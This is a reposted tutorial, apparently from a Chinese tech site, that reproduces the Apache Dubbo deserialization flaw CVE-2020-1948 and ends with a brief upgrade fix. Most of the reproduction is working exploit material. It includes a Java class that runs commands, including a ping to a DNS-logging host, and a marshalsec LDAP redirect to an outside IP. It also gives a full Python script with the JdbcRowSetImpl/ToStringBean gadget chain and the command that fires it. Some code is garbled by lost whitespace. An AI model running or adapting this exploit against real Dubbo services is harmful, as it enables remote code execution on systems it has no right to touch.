Home > Operation and Maintenance > Safety > How to analyze Apache Dubbo deserialization vulnerability

How to analyze Apache Dubbo deserialization vulnerability

WBOY
Release: 2023-05-17 16:01:22
forward
1080 people have browsed it

Introduction

Dubbo is a high-performance and excellent service framework open sourced by Alibaba, which enables applications to realize service output and input functions through high-performance RPC, and can be seamlessly integrated with the Spring framework. The system has three core functions, including remote interface method invocation, intelligent fault tolerance and load balancing, and automatic registration and discovery of services.

Overview

On June 23, 2020, Apache Dubbo officially released a risk notice for Apache Dubbo remote code execution. The vulnerability number is CVE-2020-1948, and the vulnerability level is: high risk. Apache Dubbo is a high-performance, lightweight open source Java RPC framework that provides three core capabilities: interface-oriented remote method invocation, intelligent fault tolerance and load balancing, and automatic service registration and discovery. Apache Dubbo Provider has a deserialization vulnerability. An attacker can send unrecognized service names or method names and some malicious parameter payloads through RPC requests. When the malicious parameters are deserialized, it can cause remote code execution.

Affected versions

Dubbo 2.7.0 - 2.7.6 Dubbo 2.6.0 - 2.6.7 Dubbo 2.5.x (officially no longer maintained)

Environment setup

The jdk versions of the running environment and compiled exp environment are both 8u121, start the test environment

java -jar dubbo.jar
Copy after login


will listen to port 12345 after startup

Vulnerability recurrence

Service fingerprint:


PORT      STATE SERVICE VERSION12345/tcp opentextui  Alibaba Dubbo remoting telnetd
Copy after login

Construct POC, we execute a ping command here to verify whether the command can be executed, create a new calc.java,

importjavax.naming.Context;
importjavax.naming.Name;
importjavax.naming.spi.ObjectFactory;
importjava.util.Hashtable;
publicclasscalc implementsObjectFactory{@OverridepublicObjectgetObjectInstance(Objectobj,Namename,ContextnameCtx,Hashtable<?,?>environment)throwsException{Runtime.getRuntime().exec("ping test.sr3uwk.ceye.io");
returnnull;
}}
Copy after login


Compile poc

javac calc.java
Copy after login


Put the compiled poc (calc.class) into the web website directory to ensure that the vulnerable host You can access to use the marshalsec project to start an ldap proxy service. Download marshalsec:

https://github.com/RandomRobbieBF/marshalsec-jar/raw/master/marshalsec-0.0.3-SNAPSHOT-all.jar
Copy after login


Start the LDAP proxy service. Execute this command and the ldap service will listen to port 8086


 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServerhttp://139.9.198.30/#calc 8086
Copy after login


Execute the test script. The python environment used in the test here is 3.8.0. Install the dependency package first

python3 -m pip install dubbo-py
Copy after login


Script content (Dubbo.py):

# -*- coding: utf-8 -*-importsysfromdubbo.codec.hessian2 importDecoder,new_objectfromdubbo.client importDubboClientiflen(sys.argv)<4:print(&#39;Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL&#39;.format(sys.argv[0]))print(&#39;\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp&#39;.format(sys.argv[0]))sys.exit()client =DubboClient(sys.argv[1],int(sys.argv[2]))JdbcRowSetImpl=new_object(&#39;com.sun.rowset.JdbcRowSetImpl&#39;,dataSource=sys.argv[3],strMatchColumns=["foo"])JdbcRowSetImplClass=new_object(&#39;java.lang.Class&#39;,name="com.sun.rowset.JdbcRowSetImpl",)toStringBean=new_object(&#39;com.rometools.rome.feed.impl.ToStringBean&#39;,beanClass=JdbcRowSetImplClass,obj=JdbcRowSetImpl  )resp =client.send_request_and_return_response(service_name=&#39;org.apache.dubbo.spring.boot.sample.consumer.DemoService&#39;,# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。method_name=&#39;$invoke&#39;,args=[toStringBean])output =str(resp)if&#39;Fail to decode request due to: RpcInvocation&#39;inoutput:print(&#39;[!] Target maybe not support deserialization.&#39;)elif&#39;EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()&#39;inoutput:print(&#39;[+] Succeed.&#39;)else:print(&#39;[!] Output:&#39;)print(output)print(&#39;[!] Target maybe not use dubbo-remoting library.&#39;)
Copy after login


Execute script

python3 Dubbo.py 192.168.137.17312345ldap://139.9.198.30:8086/calc
Copy after login


怎么进行Apache Dubbo反序列化漏洞的分析 Check the dnslog and successfully receive the request怎么进行Apache Dubbo反序列化漏洞的分析

ldap service can also see the request forwarding怎么进行Apache Dubbo反序列化漏洞的分析

Bomb Calculator

import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.util.Hashtable;  public class calc implements ObjectFactory {      @Override     public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {        Runtime.getRuntime().exec("calc");        return null;    } }
Copy after login

Vulnerability Fix

Upgrade to version 2.7.7 and perform parameter verification according to the method in the following link

https://github.com/apache/dubbo/pull/6374/commits/8fcdca112744d2cb98b349225a4aab365af563de

Change the protocol and deserialization method.

The above is the detailed content of How to analyze Apache Dubbo deserialization vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template